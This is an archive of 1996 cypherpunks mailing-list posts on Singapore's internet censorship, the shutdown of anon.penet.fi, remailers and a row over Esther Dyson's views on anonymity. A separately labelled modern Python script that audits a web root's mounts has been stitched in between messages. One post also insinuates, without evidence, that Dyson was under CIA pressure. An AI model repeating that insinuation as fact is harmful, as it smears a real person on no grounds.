the threat of government censorship. A few years ago a prominent right-wing religious/political leader, Jerry Falwell, put out a "Bill Of Rights For American Families" that included the right not to hear offensive foreign ideas like Communism. I agree that Singapore and America have different cultures; in an environment of free speech, if Singaporeans don't like American TV and movies, they won't watch them, and advertisers will quickly figure this out and try to find TV programs they like. 
On the other hand, if a power-hungry government decides that it doesn't like American TV, forbids business licenses to anyone who broadcasts it, and jails anyone who broadcasts TV without a business license, they're more corrupt than a government that forbids business licenses to anyone who doesn't pay a bribe. (At least in a kleptocracy, you can usually print or say what you want if you pay the bribes, though my father-in-law's newspaper was once shut down for printing that the mayor was taking bribes, and who they were from, and how much.) >In addition, you need to see the method of censorship deployed in >Singapore. For press media like papers and magazine, it is done in a >passive manner. They _do not_ read every issue of every magazine available >in Singapore. They only do so when there is enough complains. This also means you don't know what is safe to print and what isn't. You have to restrict yourself very strongly, because otherwise some politically influential person will complain to the government, and you go to jail. At least if the government tells you what the rules are, you know it's safe to say things that don't violate them. >One more point. They know it is impossible to censor everything. [....] >his reasoning is "how many people can do it? 10%? 5%? That's fine with us. >If the people really wans it, they can get it". Interesting. I don't know if this is good or bad, but at least they're realistic. It also means that if enough people want information badly enough, the government may know not to censor it. On the other hand, a government that can keep the leader of an opposition political party in jail for years just because he opposes them is pretty corrupt. >if you wish to rebuke the points which i mention above, please feel >free to do so but do so in the context wrt Singapore culture. >Do not impose the general idealogy and culture within >your country into your argument. 
The right to speak freely without government thugs shutting you down and throwing you in jail or killing you is a universal one. The ability to get anybody to listen to what you have to say, on the other hand, is highly dependent both on general culture and on the interests of the individuals you hope will listen, as well as on what you have to say and your ability to say it well.

>Now, what makes you think that citizen of Country A has the power or
>rights to tell politicians of Country B what to do and what they cannot do?
>Just wondering.

Because I have a mouth and a conscience, and they have ears and consciences. I certainly have more right to tell a politician in Country B not to stop his subjects from speaking than he does to order them not to speak. And if the politicians over here are wrong, which they often are, you've got the right to tell them that too. Of course, the politicians over here usually won't listen to you, and the politicians over there either won't listen to me or they'll add my name to the firewall killfile :-) But it's also safer for me to tell your politicians to behave well than for you to tell them, since you have to live with them.

>ps: Sorry for the off-topic discussion.

It's not off-topic. Building tools to prevent censorship is distinctly on-topic for cypherpunks, and an occasional digression into whether it's a good idea is worthwhile.

# Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # Reassign Authority!

From patrickbc at juno.com Mon Sep 2 02:15:47 1996
From: patrickbc at juno.com (patrick b cummings)
Date: Mon, 2 Sep 1996 17:15:47 +0800
Subject: free speech online
Message-ID: <19960901.014144.9678.2.patrickbc@juno.com>

I agree that there should be free speech on the net. Someone should start a petition and get as many people to sign it as possible.
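Added example, not part of any list message: the Moscowchannel.com thread earlier in this archive argues over serving a web site from read-only media and over an intruder with root mounting another directory over DocumentRoot. The sketch below is a defender's check for that condition; it assumes a Linux host and the /proc/self/mountinfo text format, and the paths, devices and sample mount tables are constructed for illustration.

```python
"""Audit a web server's document root against a snapshot of the mount table."""
import posixpath
from dataclasses import dataclass


@dataclass(frozen=True)
class Mount:
    mount_id: int
    parent_id: int
    mount_point: str
    options: frozenset
    fstype: str
    source: str


def _unescape(field):
    # mountinfo writes space, tab, newline and backslash as octal escapes.
    for code, char in (("\\040", " "), ("\\011", "\t"), ("\\012", "\n"), ("\\134", "\\")):
        field = field.replace(code, char)
    return field


def parse_mountinfo(text):
    """Fields: id parent maj:min root mountpoint opts [optional...] - fstype source superopts."""
    mounts = []
    for line in text.splitlines():
        fields = line.split()
        if not fields:
            continue
        sep = fields.index("-")  # the optional fields end at the lone "-"
        mounts.append(Mount(int(fields[0]), int(fields[1]), _unescape(fields[4]),
                            frozenset(fields[5].split(",")),
                            fields[sep + 1], _unescape(fields[sep + 2])))
    return mounts


def _covers(mount_point, path):
    return path == mount_point or path.startswith(mount_point.rstrip("/") + "/")


def audit_docroot(mounts, docroot, expected_source, expected_fstype):
    """Return a list of findings; an empty list means the docroot is as expected."""
    docroot = posixpath.normpath(docroot)
    covering = [m for m in mounts if _covers(m.mount_point, docroot)]
    if not covering:
        return ["no mount covers %s" % docroot]
    deepest = max(len(m.mount_point) for m in covering)
    at_point = [m for m in covering if len(m.mount_point) == deepest]
    # A mount stacked on another at the same point names the lower one as its parent,
    # so the visible (top) mount is the one that is nobody's parent at this point.
    parents = {m.parent_id for m in at_point}
    effective = ([m for m in at_point if m.mount_id not in parents] or at_point)[-1]

    findings = []
    if len(at_point) > 1:
        findings.append("%d mounts are stacked at %s; the top one hides the rest"
                        % (len(at_point), effective.mount_point))
    if (effective.source, effective.fstype) != (expected_source, expected_fstype):
        findings.append("%s is served from %s (%s), expected %s (%s)"
                        % (docroot, effective.source, effective.fstype,
                           expected_source, expected_fstype))
    if "ro" not in effective.options:
        findings.append("%s is writable: mount options lack 'ro'" % docroot)
    prefix = docroot.rstrip("/") + "/"
    for m in mounts:
        if m.mount_point.startswith(prefix):
            findings.append("nested mount at %s hides part of the document tree"
                            % m.mount_point)
    return findings


# Constructed snapshots: the site on a CD-ROM, the same host with a directory
# bind-mounted over the docroot, and the host after the CD-ROM was unmounted.
CLEAN = """\
22 1 8:1 / / rw,relatime shared:1 - ext4 /dev/sda1 rw
23 22 0:21 / /proc rw,nosuid,nodev,noexec - proc proc rw
40 22 11:0 / /srv/www ro,nosuid,nodev - iso9660 /dev/sr0 ro
"""
OVERMOUNTED = CLEAN + "57 40 8:1 /var/tmp/staging /srv/www rw,relatime - ext4 /dev/sda1 rw\n"
UNMOUNTED = "\n".join(CLEAN.splitlines()[:2]) + "\n"

if __name__ == "__main__":
    for name, snapshot in (("clean", CLEAN), ("overmounted", OVERMOUNTED), ("unmounted", UNMOUNTED)):
        result = audit_docroot(parse_mountinfo(snapshot), "/srv/www", "/dev/sr0", "iso9660")
        print(name, result or "ok")
```

Because the thread's threat model is an intruder who already has root, the snapshot is best collected and compared from a host that intruder does not control; a check that runs only on the compromised machine can itself be altered.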
From unicorn at schloss.li Mon Sep 2 02:17:27 1996
From: unicorn at schloss.li (Black Unicorn)
Date: Mon, 2 Sep 1996 17:17:27 +0800
Subject: "Security risks" vs. "credit risks"
In-Reply-To:
Message-ID:

On Sat, 31 Aug 1996, Timothy C. May wrote:

> I find the notion that one's speeches and Usenet utterances could "harm
> one's security rating" a distasteful idea, but so long as such security
> ratings are handled by private players, and used by private players, I see
> no illegality.

Yet another reason to be a pseudonym in the United States. I tend to agree with Mr. May. I don't really care who has "access" to information provided they do not have access to government collection resources. The former can be deterred simply by taking measures to prevent your information from being introduced into the system. They only get what you give them. The second would be more disturbing. One only deserves what privacy one secures for one's self.

>
> --Tim May
>
> We got computers, we're tapping phone lines, I know that that ain't allowed.
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May | Crypto Anarchy: encryption, digital money,
> tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
> W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets,
> Licensed Ontologist | black markets, collapse of governments.
> "National borders aren't even speed bumps on the information superhighway."

-- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li

From unicorn at schloss.li Mon Sep 2 02:33:27 1996
From: unicorn at schloss.li (Black Unicorn)
Date: Mon, 2 Sep 1996 17:33:27 +0800
Subject: Los Angeles Times article on Helsingius and anon.penet.fi
In-Reply-To: <19960901220323595.AAA208@Esther.edventure.com>
Message-ID:

On Sun, 1 Sep 1996, Esther Dyson wrote:

> Now, speaking personally: I believe there are trade-offs -- which is what I
> told the LA Times.
I assume I was quoted accurately (although the word
> "enforce" is awkward), but out of context. Anonymity can be dangerous --
> as can traceability, especially in/by repressive regimes. Therefore I would
> favor allowing anonymity -- with some form of traceability only under terms
> considerably stronger than what are generally required for a wiretap.
> Anyone who seriously needs anonymity because of a repressive government is
> likely to use a foreign (outside whatever jurisdiction he fears) server, so
> that this is not a matter of "local" laws. The tracer would have to pass
> through what I hope would be tighter hoops than we have now.
>
> Please note that this is not the same as the right to *private*
> conversations and the use of encryption; this is the issue of being
> accountable for what you publish in public.

I've left the attribution list open because I think my view a majority one. The inclinations I had to be involved with or financially support EFF are, after reading this, entirely quashed. What is or is not your personal or EFF's official position is meaningless. It is clear that the personal beliefs of those involved in EFF are those of compromise, present day politics, and a general lack of moral fiber. The political assumptions and the degree of technical invasion that would make the above scheme possible are either hopelessly naive, or insidiously invasive. A scheme to make every net goer traceable (albeit with some undefined mechanism to "safeguard" against abuse) is, even in its core requirements, frightening. Whatever respect I had for EFF collectively and the individuals working within the organization is much diminished, if it survives at all.

> Yes, I'm aware of the complexities, and of the possibilities for
> miscarriages of justice.

Yet you address this where exactly, even now in your "apology" or "explanation" statement?
> Speaking for myself, only (and publicly), > Esther Dyson Perhaps you should have spoken publically but anonymously the first time? Having not done so, I think you have damaged yourself as well as EFF. > Esther Dyson Always make new mistakes! I find the above amusing. -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From lutz at as-node.jena.thur.de Mon Sep 2 02:44:39 1996 From: lutz at as-node.jena.thur.de (Lutz Donnerhacke) Date: Mon, 2 Sep 1996 17:44:39 +0800 Subject: Pseudonym server: Jenaer Anonymous Service In-Reply-To: <199609011109.NAA14105@jengate.thur.de> Message-ID: * stewarts at ix.netcom.com wrote: > Jenaer Anonymous Service > looks like a high-security pseudonym server. Thanks. > rather than having it arrive directly. But in return, > it's pretty secure, since you can only get caught if the > remailer or its operator are compromised when you request a delivery. It's strongly recomment to use a reply server to forward your requests to. The server sends all outgoing messages via mixmaster chains. (mixmaster at as-node.jena.thur.de can is always the first one in the chain). The policy of this remailer urges the user to send incoming jobs only via mixmaster chains. It may be changed to drop incoming jobs which does not come from the local mixmaster silently. > I haven't yet checked if how flexible it is about the location > of Reply-To: in the headers, since some mailers make it difficult > to paste that in. Reply-To: is neccessary to be included in the encrypted message body. All readable header informations execpt Subject: {help,send} is drop to /dev/null including the To:, From:, Sender:, Path:, Reply-To: ... lines. > The public key for the server is signed by Lutz.Donnerhacke at Jena.Thur.De, > which is in turn signed by 0x3B7F286D, which MIT thinks is an unknown > signator... 0x3B7F286D is the key of Winfried Mueller, the maintainer and autor of Religio, an information system anout religious subjects. 
A lot of documents fight against Scientology. Try http://Www.thur.de/religio/. Type Bits/KeyID Date User ID pub 2048/39F37F5D 1996/04/25 Lutz Donnerhacke Lutz Donnerhacke
> Because you don't get your reply email until you ask to pick it up, > it does seem easy to abuse; complaints, flames, and mailbombs won't reach you > if you don't ask for them. I hope the operator doesn't mind the workload > of managing the remailer - it looks like a good service, and with > Julf's remailer shut down, we need more nymservers. Sure. My nymserver is completely written as a bash script. -- | Lutz Donnerhacke +49/3641/380259 voice, -60 ISDN, -61 V.34 und Fax | From MAILER-DAEMON at mqg-smtp3.usmc.mil Mon Sep 2 02:47:32 1996 From: MAILER-DAEMON at mqg-smtp3.usmc.mil (MAILER-DAEMON at mqg-smtp3.usmc.mil) Date: Mon, 2 Sep 1996 17:47:32 +0800 Subject: Undeliverable Message Message-ID: To: Cc: Subject: Re: It is good that anon.penet.fi has been closed! Message not delivered to recipients below. Press F1 for help with VNM error codes. VNM3043: BANYAN SERVER at MAG26@2DMAW NEW RIVER VNM3043 -- MAILBOX IS FULL The message cannot be delivered because the recipient's mailbox contains the maximum number of messages, as set by the system administrator. The recipient must delete some messages before any other messages can be delivered. The maximum message limit for a user's mailbox is 10,000. The default message limit is 1000 messages. Administrators can set message limits using the Mailbox Settings function available in the Manage User menu (MUSER). When a user's mailbox reaches the limit, the user must delete some of the messages before the mailbox can accept any more incoming messages. On Sun, 1 Sep 1996, Igor Chudov @ home wrote: > I believe that Private Idaho is a cypherpunks remailer client for Windows. True. But it is a separate program from email clients which means that anyone wanting to use Private Idaho has to download it, install it, and learn how to use it in conjunction with one's email program.
Most people who may have a need for anonymity have probably never heard of PGP or Private Idaho. I think that until remailer functions are actually built into the programs that people use, remailer use will be rare. -- Mark PGP encrypted mail preferred. Key fingerprint = d61734f2800486ae6f79bfeb70f95348 http://www.voicenet.com/~markm/ From MAILER-DAEMON at mqg-smtp3.usmc.mil Mon Sep 2 02:52:11 1996 From: MAILER-DAEMON at mqg-smtp3.usmc.mil (MAILER-DAEMON at mqg-smtp3.usmc.mil) Date: Mon, 2 Sep 1996 17:52:11 +0800 Subject: Undeliverable Message Message-ID: To: Cc: Subject: Re: DON'T Nuke Singapore Back into the Stone Age Message not delivered to recipients below. Press F1 for help with VNM error codes. VNM3043: BANYAN SERVER at MAG26@2DMAW NEW RIVER VNM3043 -- MAILBOX IS FULL The message cannot be delivered because the recipient's mailbox contains the maximum number of messages, as set by the system administrator. The recipient must delete some messages before any other messages can be delivered. The maximum message limit for a user's mailbox is 10,000. The default message limit is 1000 messages. Administrators can set message limits using the Mailbox Settings function available in the Manage User menu (MUSER). When a user's mailbox reaches the limit, the user must delete some of the messages before the mailbox can accept any more incoming messages.
On Mon, 2 Sep 1996, James Seng wrote: > Now, what makes you think that citizen of Country A has the power or > rights to tell politicians of Country B what to do and what they cannot do? > Just wondering. I have every right as a citizen of country A to tell politicians of country B what they should or shouldn't do. This isn't about American Ideology; it's about natural rights. Politicians of country B can refuse to listen to me or attempt to prevent my corrupt ideas from polluting the minds of its citizens, but they won't succeed very well with the latter. Of course, politicians may be satisfied with making sure that only the most determined citizens will be able to access information they don't want citizens to access, but as technology progresses, it will become much more difficult to prevent this information from spreading to the masses. > > ps: Sorry for the off-topic discussion. Cpunks is certainly not the best place to be discussing free speech. However, the link between free speech and the spread of cryptographic technology is too close to completely overlook. -- Mark PGP encrypted mail preferred. Key fingerprint = d61734f2800486ae6f79bfeb70f95348 http://www.voicenet.com/~markm/ From stewarts at ix.netcom.com Mon Sep 2 02:53:04 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Mon, 2 Sep 1996 17:53:04 +0800 Subject: It is good that anon.penet.fi has been closed!
Message-ID: <199609020721.AAA21297@toad.com> In a challenging article posted 12:33 PM 9/1/96 -0500, ichudov at algebra.com (Igor Chudov) wrote: >Yes, subject says it all. anon.penet.fi was a whole lot worse than >cypherpunks remailers. It provided clueless users with no real security, >because it stored return addresses and did not use chaining and >encryption. There are different reasons people use remailers, different amounts of security they need, and different levels of security that the remailers can provide. Anon.penet.fi was a Good Thing. It got a few hundred thousand people thinking about remailers, and why they want them, and thinking they were good tools. It helped the public learn that anonymity is useful for real people, and helped the public learn that they can't always believe an email message is from the "person" on the From: line, and that email and news postings aren't always authentic just because they come out of a computer :-) One way to provide privacy is through heavy mathematics; for some people, and some threats, you need that. Another way to provide privacy is through a trusted operator who's willing to put up with a lot of crap to provide the service. For many people, that's enough - not for people worried about eavesdroppers and overthrowing governments, but enough for people talking about their attitudes toward work and sex and drugs who don't want their email traced by their employers, nosy neighbors, or local vice cops. And part of this security is the willingness to close down a popular service when its security is threatened. One feature that's really needed for many remailer applications is reply addresses. Doing that securely with cypherpunks-style remailers is hard; doing it securely with trusted-sysop remailers is much easier, and even then there were occasional bugs, and plain surprises.
In general, anything that knows the return path is vulnerable; if the person sending the reply knows the destination address, which doesn't apply to many of the applications, the remailer system in between can be secure, but otherwise you're not "truly secure" - only "pretty good". Knowing what the users really want to do helps you do it more securely. From what I know of remailer history, the main original goal of the cypherpunks-style remailer was to provide security against traffic analysis by eavesdroppers, rather than to prevent the recipient from knowing the sender's address, though everybody pretty quickly realized that the latter was an interesting feature, especially coupled with posting to Usenet. Learning the differences between what people will really do with 2-way remailers as opposed to 1-way remailers can be done better with an easy-to-use 2-way remailer like penet.fi which can get 500,000 (possibly duplicated) users than with moderately complicated systems like alpha.c2.org or the really complicated things that may be needed to get better security. >Maybe closing of anon.penet.fi will spur real interest from the unwashed >alt.sex.* masses to the truly secure remailers. Who knows; maybe the most effective way to fund "truly secure" (bwah-hah-ha) remailers will turn out to be to carry phone sex advertising :-) Or maybe somebody will build a decent digicash interface to a remailer, which will help get digicash going now that everybody who uses remailers will be looking for a new home. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # Reassign Authority!
From stewarts at ix.netcom.com Mon Sep 2 03:02:15 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Mon, 2 Sep 1996 18:02:15 +0800 Subject: Educating former anon.penet.fi users about other remailers Message-ID: <199609020724.AAA21373@toad.com> I've gotten about 5 messages from daemon at anon.penet.fi telling me that the remailer is closed; don't know if they're from various previous identities, or if they're from postings to mailing lists with anonymous people on them, or whatever. If somebody were to put together a one-page note on other remailers, would it make sense to send it to all the penet.fi users?
A canonical cypherpunks approach would be to just write one and send it to na000001 at anon.penet.fi ..... na600000 at anon.penet.fi, but I assume either my system or Julf's would decide it was spam and discard it (even if it were split up into 60,000 10-message chunks.) The press release on www.penet.fi does contain pointers to the FAQs, but people have to go looking for that. On the other hand, if there are an extra 10,000 hits per day on alpha.c2.org because of a really well-written one-page blurb, can it handle the load? # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # Reassign Authority! From jseng at pobox.org.sg Mon Sep 2 04:56:36 1996 From: jseng at pobox.org.sg (James Seng) Date: Mon, 2 Sep 1996 19:56:36 +0800 Subject: Encourage Singapore To Come Out Of the Stone Age Message-ID: <199609020913.TAA11331@jagumba.anu.edu.au> At 11:29 PM 9/1/96 -0700, Bill Stewart wrote: >bring it into disrespect deserves no respect at all. Any government >that claims to have the god-like wisdom to dictate what's best for >its subjects to hear or what religious ideas to believe doesn't >deserve to be listened to, much less obeyed. If Singapore's government >and religious leaders want to say "Our ideas are better than American >ideas", and you or I or your neighbor want to listen to them, fine; I think you have misunderstood my posting. I never say Singapore ideas are better than American ideas. What i am saying is that Asian (Singapore) values are _DIFFERENT_ from western (America) values. [i know i am generalising] When you look at the laws and regulation. You cannot just look at what you think is best. You have to look at other things. Culture, social and economical structure, religion and history. In every aspect, Singapore (or most Asian for that matter) are different. Thus, you cannot judge a Singapore government action based on your social background. 
My purpose of posting is to hope to bring some light to the people here about some social norm in Singapore, hopefully to explain why the government choose to block certain WWW and yet was not strongly opposed here. Secondly, you do not need to convince me. I agree with you totally. What you have to convince is the general population here, against the culture, the society and everything. >maybe some of their ideas are better than some of the many ideas >floating around North America. But if you or I or your neighbor >want to listen to competing ideas, and even to believe and talk about >competing ideas, neither you nor the government have the right to >stop them - only to refute them with better ideas. Nope. I am open to ideas which is why i been watching to this thread. I find it is rather constructive to see how people think about Singapore and then compare it with my own ideas. However, i also know it is useless to have continue discussion with fanatic as they have a tendency to distort what you say to suit their argument. Nor are they particular open minded to listen to others like our dear Tim has clearly shown us. This is why i am responding to your article and not his. >On the other hand, if a power-hungry government decides that it doesn't >like American TV, forbids business licenses to anyone who broadcasts it, >and jails anyone who broadcasts TV without a business license, >they're more corrupt than a government that forbids business licenses to >anyone who doesn't pay a bribe. (At least in a kleptocracy, >you can usually print or say what you want if you pay the bribes, >though my father-in-law's newspaper was once shut down for printing >that the mayor was taking bribes, and who they were from, and how much.) Sad to say, Singapore government does have a lot of power. But i am glad what you mention isn't happening in Singapore. I haven't heard of any serious corruption cases or people accepting bribes etc.
Nor does the people here feel a suppressed nor are there general dissatisfaction. I think you are too influenced with the perspective from 1984. *8) All things works both ways. Power is no otherwise. >This also means you don't know what is safe to print and what isn't. >You have to restrict yourself very strongly, because otherwise >some politically influential person will complain to the government, >and you go to jail. At least if the government tells you what >the rules are, you know it's safe to say things that don't violate them. You don't go to jail for writing articles. You might be sued for defamation if you published something untrue (similar to your civil lawsuit i guess?) and have to pay large sum of money to the person but you don't go to jail. And yes, they are telling the people what _are_ the things now so you know what to avoid. >It also means that if enough people want information badly enough, >the government may know not to censor it. On the other hand, >a government that can keep the leader of an opposition political party >in jail for years just because he opposes them is pretty corrupt. I am not interested in politics so i didn't really know what is happening in that case. for that, i have no comment. >The right to speak freely without government thugs shutting you down >and throwing you in jail or killing you is a universal one. >The ability to get anybody to listen to what you have to say, >on the other hand, is highly dependent both on general culture >and on the interests of the individuals you hope will listen, >as well as on what you have to say and your ability to say it well. Very true. So does the First Amendment said. Singapore does have such similar law as First Amendment which is slightly "modified". You have freedom of speech as long as your comments does not endanger religious/racist harmony and national security. (I do not know the exact term..need a lawyer for that..). The reasons for this are for historical reasons which trace back.
>Because I have a mouth and a conscience, and they have ears and consciences. >I certainly have more right to tell a politician in Country B not to >stop his subjects from speaking than he does to order them not to speak. >And if the politicians over here are wrong, which they often are, >you've got the right to tell them that too. Of course, the politicians >over here usually won't listen to you, and the politicians over there >either won't listen to me or they'll add my name to the firewall killfile :-) >But it's also safer for me to tell your politicians to behave well than >for you to tell them, since you have to live with them. Fair enough. Point taken and you are right. I was able to say that you are not the one who are going to vote for/against them in the next election. *8) >It's not off-topic. Building tools to prevent censorship is >distinctly on-topic for cypherpunks, and an occasional digression into >whether it's a good idea is worthwhile. Perhaps but not to the other thousand of other cypherpunk subscribers. With this, i hope i have explained any misunderstanding with the previous posting. If you wish to carry on with this discussion, please feel free to email me directly. -James Seng From proff at suburbia.net Mon Sep 2 06:23:51 1996 From: proff at suburbia.net (Julian Assange) Date: Mon, 2 Sep 1996 21:23:51 +0800 Subject: Los Angeles Times article on Helsingius and anon.penet.fi In-Reply-To: Message-ID: <199609021023.UAA09571@suburbia.net> > On Sun, 1 Sep 1996, Esther Dyson wrote: > > > Now, speaking personally: I believe there are trade-offs -- which is what I > > told the LA Times. I assume I was quoted accurately (although the word > > "enforce" is awkward), but out of context. Anonymity can be dangerous -- > > as can traceability, especially in/by repressive regimes. Therefore I would > > favor allowing anonymity -- with some form of traceability only under terms > > considerably stronger than what are generally required for a wiretap.
> > Anyone who seriously needs anonymity because of a repressive government is > > likely to use a foreign (outside whatever jurisdiction he fears) server, so > > that this is not a matter of "local" laws. The tracer would have to pass > > through what I hope would be tighter hoops than we have now. > > > > Please note that this is not the same as the right to *private* > > conversations and the use of encryption; this is the issue of being > > accountable for what you publish in public. > > I've left the attribution list open because I think my view a majority > one. > > The inclinations I had to be involved with or financially support EFF are, > after reading this, entirely quashed. > > What is or is not your personal or EFF's official position is meaningless. > It is clear that the personal beliefs of those involved in EFF are > those of compromise, present day politics, and a general lack of moral > fiber. > > The political assumptions and the degree of technical invasion that would > make the above scheme possible are either hopelessly naive, or insidiously > invasive. > > -- > I hate lightning - finger for public key - Vote Monarchist > unicorn at schloss.li I agree with you whole-heartedly. I am stunned by the EFF's position on this matter and they no longer have my support. Here are some more of Dyson's statements on this subject. [http://bin-1.gnn.com/gnn/feat/dyson/index.html] [...] The EFF began very much as a civil rights "don't tread on me" kind of organization, and in a sense one of our major jobs was helping to educate law enforcement and the government. I wouldn't say that job is done, but now we also need to educate a broader population. If our motto was civil rights in cyberspace, it's now civil rights and responsibilities, because as more people come on to the Internet, they have to understand their responsibilities as well as their rights. If people don't do that, someone is going to try to come and regulate them.
We are trying to create a civil society rather than a legal society in cyberspace. [...] We are strongly in favor of privacy, although there's some kind of balance required because of the need for a free press. Anonymity is a tougher one, and we actually don't have a formal position on that. The need for anonymity I agree with, but there are issues with accountability that mean it shouldn't be absolute. Examining in detail Dyson's interests it appears she maintains a sizeable and long-standing interest in Eastern European technology companies. She is also clearly very far to the right of the political spectrum (rampant capitalist would be putting it mildly). She also speaks Russian. I'm not saying she has been working for the CIA for the past decade, but I would be very surprised if the CIA has not exerted quite significant pressure (which they are easily able to do given the location of many of Dyson's assets) in order to bring her into their folds during that time period. -- "Of all tyrannies a tyranny sincerely exercised for the good of its victims may be the most oppressive. It may be better to live under robber barons than under omnipotent moral busybodies, The robber baron's cruelty may sometimes sleep, his cupidity may at some point be satiated; but those who torment us for own good will torment us without end, for they do so with the approval of their own conscience." - C.S. Lewis, _God in the Dock_ +---------------------+--------------------+----------------------------------+ |Julian Assange RSO | PO Box 2031 BARKER | Secret Analytic Guy Union | |proff at suburbia.net | VIC 3122 AUSTRALIA | finger for PGP key hash ID = | |proff at gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 | +---------------------+--------------------+----------------------------------+ From dlv at bwalk.dm.com Mon Sep 2 07:06:21 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Mon, 2 Sep 1996 22:06:21 +0800 Subject: Sen. 
Leahy's "impeccable cyberspace credentials" In-Reply-To: Message-ID: jonathon writes: > On Sun, 1 Sep 1996, James A. Donald wrote: > > > > I agree with what you are saying but not all politicians are that bad. > > > You make it sound as if there are no politicians are for freedom of the > > > net. > > So who is the exception? > > Harry Browne Libertarian Party Candidate. Harry Browne is a fucking statist. All politicians are scum. No exceptions. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From dlv at bwalk.dm.com Mon Sep 2 07:06:28 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Mon, 2 Sep 1996 22:06:28 +0800 Subject: Free Speech and List Topics In-Reply-To: Message-ID: tcmay at got.net (Timothy C. May) writes: > More disturbing to me recently has been the steady increase in subscribers > to this list who don't seem to value free speech very highly, who write of > their own nation's censorship as valiant efforts to protect citizen-units > from foreign devils, and, even more shockingly, from supposed defenders of > electronic freedom who are now talking about the need for limits on > anonymity. The Freedom Knights are the only true defenders of True Free Speech. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From pjn at nworks.com Mon Sep 2 07:22:05 1996 From: pjn at nworks.com (pjn at nworks.com) Date: Mon, 2 Sep 1996 22:22:05 +0800 Subject: wardialer Message-ID: > Does any body know where I can get a half decent war dialer. > In> Use a websearch utility, and stop posting to cryptography-based In> mailing lists. Someone should shoot that kid and put US out of OUR misery... :) P.J. pjn at nworks.com ... Nothing is opened more often by mistake than YOUR mouth.
___ Blue Wave/QWK v2.20 [NR] From asgaard at Cor.sos.sll.se Mon Sep 2 07:26:51 1996 From: asgaard at Cor.sos.sll.se (Asgaard) Date: Mon, 2 Sep 1996 22:26:51 +0800 Subject: Sharp knives In-Reply-To: Message-ID: "James A. Donald" , writes: >I heard on talk.politics.guns somebody say that in Sweden they >had banned knives with a sharp point at the end, and were going >to ban sharp knives altogether. I think he was just engaging in >hyperbole, that he really meant that gun control in Sweden was >unreasonably strict, but on reflection I am not sure. There is a law in Sweden, some 5 years old, against carrying 'dangerous devices' (hunting knives, Ninja stars etc) in 'public places' (unless you are a carpenter, electrician or some such going about your business). It's okay to carry a knife when going fishing/hunting or sitting on your terrace carving totem poles. It's only a misdemeanour and might be punished with a fine, but usually the cops just use the law to disarm street gangs on the spot. The effects of the law are dubious. Knives have come into fashion among teenagers after this legislation (but not as a consequence of it, I think). Asgaard From frissell at panix.com Mon Sep 2 08:01:52 1996 From: frissell at panix.com (Duncan Frissell) Date: Mon, 2 Sep 1996 23:01:52 +0800 Subject: DON'T Nuke Singapore Back into the Stone Age Message-ID: <2.2.32.19960902124403.00ae6430@panix.com> At 07:06 AM 9/2/96 +0800, James Seng wrote: >that). I have a long argument with this person, telling him that despite >what they have done, i could still access to those stuff which they ban. >his reasoning is "how many people can do it? 10%? 5%? That's fine with us. >If the people really wants it, they can get it". The flaw with this view is that it is no harder to deploy software that defeats Singapore's proxy than it is to establish a tcp/ip connection in the first place.
For civilians (such as myself) establishing a tcp/ip connection is as hard or as easy as establishing an encrypted tcp/ip tunnel to defeat government control efforts. For both these tasks, I am dependent on software writers who know more than I do.

Since the software of the Net is written by people not governments, the governments will find it hard to hold "free users" down to a 5% or 10% figure. The Net is nothing more than the software that it runs on and we (not governments) write the software.

In addition, we are not imposing our ideology on Singapore. If Singapore changes, it will be because an encounter with the realities of the free flow of information changes it.

DCF

From m5 at tivoli.com Mon Sep 2 08:10:20 1996
From: m5 at tivoli.com (Mike McNally)
Date: Mon, 2 Sep 1996 23:10:20 +0800
Subject: Encourage Singapore To Come Out Of the Stone Age
In-Reply-To: <199609020913.TAA11331@jagumba.anu.edu.au>
Message-ID: <322AD535.3E6C@tivoli.com>

James Seng wrote:
>
> I am not interested in politics so i didn't really know what is
> happening in that case. for that, i have no comment.

Gee, James, have you paused to wonder whether the presence of a truly free press might make it really difficult for a smart person like yourself to *not* find out about political prisoners?

______c_________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX * For the time being,
m5 at tivoli.com * m101 at io.com *
* three heads and eight arms.

From liberty at gate.net Mon Sep 2 08:23:31 1996
From: liberty at gate.net (Jim Ray)
Date: Mon, 2 Sep 1996 23:23:31 +0800
Subject: "Always make new mistakes"
Message-ID: <199609021248.IAA84818@osceola.gate.net>

-----BEGIN PGP SIGNED MESSAGE-----

Esther Dyson sigfiled:
...
> Esther Dyson Always make new mistakes!

OK, but must we always be trying to make the same *old* ones, only in a new medium? At least there's still EPIC (for now, I'm wondering when _they_ decide to cave?). I'm feeling pessimistic.
JMR

Regards, Jim Ray -- DNRC Minister of Encryption Advocacy & Weekend Winsock Wemailer Opewator.

"Whoever would overthrow the liberty of a nation must begin by subduing the freeness of speech." -- Benjamin Franklin

Defeat the Duopoly! Stop the Browne-out!
Harry Browne for President. Jo Jorgensen for Vice-president.
http://www.HarryBrowne96.org/
http://www.twr.com/stbo
___________________________________________________________________
PGP id.E9BD6D35 51 5D A2 C3 92 2C 56 BE 53 2D 9C A1 B3 50 C9 C8
http://www.shopmiami.com/prs/jimray
___________________________________________________________________

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMirUhG1lp8bpvW01AQHR3QQAl9EvaUOCHnTZ0eyIa+kv41fXDJMsOC0v
BUGKvnz3rfVxRTS3JiHALB93Kc1F+kSjoOd7ftM42Pod4bsreSAHJ0CInJ2Q8iYS
